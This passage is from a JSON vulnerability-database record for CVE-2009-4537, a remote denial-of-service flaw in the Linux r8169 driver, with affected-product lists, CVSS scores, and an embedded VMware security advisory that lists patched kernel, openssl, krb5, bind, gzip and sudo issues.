        "version": "2.6.8"
      },
      {
        "model": "enterprise linux 5.2.z server",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.8"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel 2.6.31-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "intuity audix lx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pardus",
        "version": "20090"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.2"
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "kernel -test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.315"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.5"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.4"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel -test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.1"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "messaging storage server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel -test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux enterprise high availability extension",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "37521"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001005"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-061"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4537"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2.6.32.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-4537"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Fabian Yamaguchi",
    "sources": [
      {
        "db": "BID",
        "id": "37521"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-061"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2009-4537",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2009-4537",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-41983",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2009-4537",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201001-061",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-41983",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2009-4537",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-41983"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-4537"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001005"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-061"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-4537"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "drivers/net/r8169.c in the r8169 driver in the Linux kernel 2.6.32.3 and earlier does not properly check the size of an Ethernet frame that exceeds the MTU, which allows remote attackers to (1) cause a denial of service (temporary network outage) via a packet with a crafted size, in conjunction with certain packets containing A characters and certain packets containing E characters; or (2) cause a denial of service (system crash) via a packet with a crafted size, in conjunction with certain packets containing \u0027\\0\u0027 characters, related to the value of the status register and erroneous behavior associated with the RxMaxSize register.  NOTE: this vulnerability exists because of an incorrect fix for CVE-2009-1389. Linux kernel of r8169 The driver MTU Service operation disruption due to incomplete processing of Ethernet frames exceeding (DoS) There is a vulnerability that becomes a condition.Service operation disruption to a third party (DoS) There is a possibility of being put into a state. The Linux Kernel is prone to a remote denial-of-service vulnerability. \nAn attacker can exploit this issue to deny service to legitimate users; other attacks are also possible. \nThe following are vulnerable:\nLinux kernel prior to 2.6.12\nLinux Kernel 2.6.30 and later. The NFSv4 implementation is one of the distributed file system protocols. The vulnerability is related to the wrong behavior of the value of the status register and the RxMaxSize register. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID:       VMSA-2010-0009\nSynopsis:          ESXi ntp and ESX Service Console third party updates\nIssue date:        2010-05-27\nUpdated on:        2010-05-27 (initial release of advisory)\nCVE numbers:       CVE-2009-2695 CVE-2009-2908 CVE-2009-3228\n                   CVE-2009-3286 CVE-2009-3547 CVE-2009-3613\n                   CVE-2009-3612 CVE-2009-3620 CVE-2009-3621\n                   CVE-2009-3726 CVE-2007-4567 CVE-2009-4536\n                   CVE-2009-4537 CVE-2009-4538 CVE-2006-6304\n                   CVE-2009-2910 CVE-2009-3080 CVE-2009-3556\n                   CVE-2009-3889 CVE-2009-3939 CVE-2009-4020\n                   CVE-2009-4021 CVE-2009-4138 CVE-2009-4141\n                   CVE-2009-4272 CVE-2009-3563 CVE-2009-4355\n                   CVE-2009-2409 CVE-2009-0590 CVE-2009-1377\n                   CVE-2009-1378 CVE-2009-1379 CVE-2009-1386\n                   CVE-2009-1387 CVE-2009-4212 CVE-2009-1384\n                   CVE-2010-0097 CVE-2010-0290 CVE-2009-3736\n                   CVE-2010-0001 CVE-2010-0426 CVE-2010-0427\n                   CVE-2010-0382\n- ------------------------------------------------------------------------\n\n1. Summary\n\n   ESXi update for ntp and ESX Console OS (COS) updates for COS\n   kernel, openssl, krb5, gcc, bind, gzip, sudo. \n\n2. Relevant releases\n\n   VMware ESX 4.0.0 without patches ESX400-201005401-SG,\n   ESX400-201005406-SG, ESX400-201005408-SG, ESX400-201005407-SG,\n   ESX400-201005405-SG, ESX400-201005409-SG\n\n3. Problem Description\n\n a. Service Console update for COS kernel\n\n    Updated COS package \"kernel\" addresses the security issues that are\n    fixed through versions 2.6.18-164.11.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,\n    CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues\n    fixed in kernel 2.6.18-164.6.1\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,\n    CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537,\n    CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,\n    CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,\n    CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to\n    the security issues fixed in kernel 2.6.18-164.11.1. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005401-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n b. ESXi userworld update for ntp\n\n    The Network Time Protocol (NTP) is used to synchronize the time of\n    a computer client or server to another server or reference time\n    source. \n\n    A vulnerability in ntpd could allow a remote attacker to cause a\n    denial of service (CPU and bandwidth consumption) by using\n    MODE_PRIVATE to send a spoofed (1) request or (2) response packet\n    that triggers a continuous exchange of MODE_PRIVATE error responses\n    between two NTP daemons. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-3563 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           4.0       ESXi     ESXi400-201005401-SG\n    ESXi           3.5       ESXi     affected, patch pending\n\n    ESX            any       ESX      not applicable\n\n    vMA            any       RHEL5    not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n c. Service Console package openssl updated to 0.9.8e-12.el5_4.1\n\n    OpenSSL is a toolkit implementing SSL v2/v3 and TLS protocols with\n    full-strength cryptography world-wide. \n\n    A memory leak in the zlib could allow a remote attacker to cause a\n    denial of service (memory consumption) via vectors that trigger\n    incorrect calls to the CRYPTO_cleanup_all_ex_data function. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-4355 to this issue. \n\n    A vulnerability was discovered which may allow remote attackers to\n    spoof certificates by using MD2 design flaws to generate a hash\n    collision in less than brute-force time. NOTE: the scope of this\n    issue is currently limited because the amount of computation\n    required is still large. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-2409 to this issue. \n\n    This update also includes security fixes that were first addressed\n    in version openssl-0.9.8e-12.el5.i386.rpm. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the names CVE-2009-0590, CVE-2009-1377, CVE-2009-1378,\n    CVE-2009-1379, CVE-2009-1386 and CVE-2009-1387 to these issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005401-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending**\n\n  *  hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n  ** see VMSA-2010-0004\n\n d. Service Console update for krb5 to 1.6.1-36.el5_4.1 and pam_krb5 to\n    2.2.14-15. \n\n    Kerberos is a network authentication protocol. It is designed to\n    provide strong authentication for client/server applications by\n    using secret-key cryptography. \n\n    Multiple integer underflows in the AES and RC4 functionality in the\n    crypto library could allow remote attackers to cause a denial of\n    service (daemon crash) or possibly execute arbitrary code by\n    providing ciphertext with a length that is too short to be valid. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-4212 to this issue. \n\n    The service console package for pam_krb5 is updated to version\n    pam_krb5-2.2.14-15. This update fixes a flaw found in pam_krb5. In\n    some non-default configurations (specifically, where pam_krb5 would\n    be the first module to prompt for a password), a remote attacker\n    could use this flaw to recognize valid usernames, which would aid a\n    dictionary-based password guess attack. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-1384 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005406-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n e. Service Console package bind updated to 9.3.6-4.P1.el5_4.2\n\n    BIND (Berkeley Internet Name Daemon) is by far the most widely used\n    Domain Name System (DNS) software on the Internet. \n\n    A vulnerability was discovered which could allow remote attacker to\n    add the Authenticated Data (AD) flag to a forged NXDOMAIN response\n    for an existing domain. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0097 to this issue. \n\n    A vulnerability was discovered which could allow remote attackers\n    to conduct DNS cache poisoning attacks by receiving a recursive\n    client query and sending a response that contains CNAME or DNAME\n    records, which do not have the intended validation before caching. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0290 to this issue. \n\n    A vulnerability was found in the way that bind handles out-of-\n    bailiwick data accompanying a secure response without re-fetching\n    from the original source, which could allow remote attackers to\n    have an unspecified impact via a crafted response. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0382 to this issue. \n\n    NOTE: ESX does not use the BIND name service daemon by default. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005408-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n f. Service Console package gcc updated to 3.2.3-60\n\n    The GNU Compiler Collection includes front ends for C, C++,\n    Objective-C, Fortran, Java, and Ada, as well as libraries for these\n    languages\n\n    GNU Libtool\u0027s ltdl.c attempts to open .la library files in the\n    current working directory.  This could allow a local user to gain\n    privileges via a Trojan horse file.  The GNU C Compiler collection\n    (gcc) provided in ESX contains a statically linked version of the\n    vulnerable code, and is being replaced. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-3736 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      ESX400-201005407-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n g. Service Console package gzip update to 1.3.3-15.rhel3\n\n    gzip is a software application used for file compression\n\n    An integer underflow in gzip\u0027s unlzw function on 64-bit platforms\n    may allow a remote attacker to trigger an array index error\n    leading to a denial of service (application crash) or possibly\n    execute arbitrary code via a crafted LZW compressed file. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0001 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005405-SG\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n h. Service Console package sudo updated to 1.6.9p17-6.el5_4\n\n    Sudo (su \"do\") allows a system administrator to delegate authority\n    to give certain users (or groups of users) the ability to run some\n    (or all) commands as root or another user while providing an audit\n    trail of the commands and their arguments. \n\n    When a pseudo-command is enabled, sudo permits a match between the\n    name of the pseudo-command and the name of an executable file in an\n    arbitrary directory, which allows local users to gain privileges\n    via a crafted executable file. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0426 to this issue. \n\n    When the runas_default option is used, sudo does not properly set\n    group memberships, which allows local users to gain privileges via\n    a sudo command. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2010-0427 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201005409-SG\n    ESX            3.5       ESX      not applicable\n    ESX            3.0.3     ESX      not applicable\n    ESX            2.5.5     ESX      not applicable\n\n    vMA            4.0       RHEL5    affected, patch pending\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the md5sum of your downloaded file. \n\n   ESX 4.0\n   -------\n   http://bit.ly/aqTCqn\n   md5sum: ace37cd8d7c6388edcea2798ba8be939\n   sha1sum: 8fe7312fe74a435e824d879d4f1ff33df25cee78\n   http://kb.vmware.com/kb/1013127\n\n   Note ESX400-201005001 contains the following security bulletins\n   ESX400-201005404-SG (ntp), ESX400-201005405-SG (gzip),\n   ESX400-201005408-SG (bind), ESX400-201005401-SG (kernel, openssl),\n   ESX400-201005406-SG (krb5, pam_krb5), ESX400-201005402-SG (JRE),\n   ESX400-201005403-SG (expat), ESX400-201005409-SG (sudo),\n   ESX400-201005407-SG (gcc). \n\n5. References\n\n   CVE numbers\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2695\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2908\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3228\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3286\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3613\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3612\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3621\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3726\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4567\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4536\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4537\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4538\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6304\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2910\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3080\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3556\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3889\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3939\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4020\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4021\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4138\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4141\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4355\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0590\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4212\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0097\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0290\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3736\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0001\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0426\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0427\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0382\n\n- ------------------------------------------------------------------------\n\n6. Change log\n\n2010-05-27  VMSA-2010-0009\nInitial security advisory after release of patch 06 bulletins for ESX\n4.0 on 2010-05-27\n\n- -----------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Center\nhttp://www.vmware.com/security\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2010 VMware Inc.  All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.10 (MingW32)\n\niEYEARECAAYFAkv/V8IACgkQS2KysvBH1xnqNgCcCwwelsQK6DQjcTc2wnIPp0EW\nE70An2gfkiCQ5FNqvf3y+kNredxyVZwI\n=JW3s\n-----END PGP SIGNATURE-----\n. ===========================================================\nUbuntu Security Notice USN-947-1              June 03, 2010\nlinux, linux-source-2.6.15 vulnerabilities\nCVE-2009-4271, CVE-2009-4537, CVE-2010-0008, CVE-2010-0298,\nCVE-2010-0306, CVE-2010-0419, CVE-2010-0437, CVE-2010-0727,\nCVE-2010-0741, CVE-2010-1083, CVE-2010-1084, 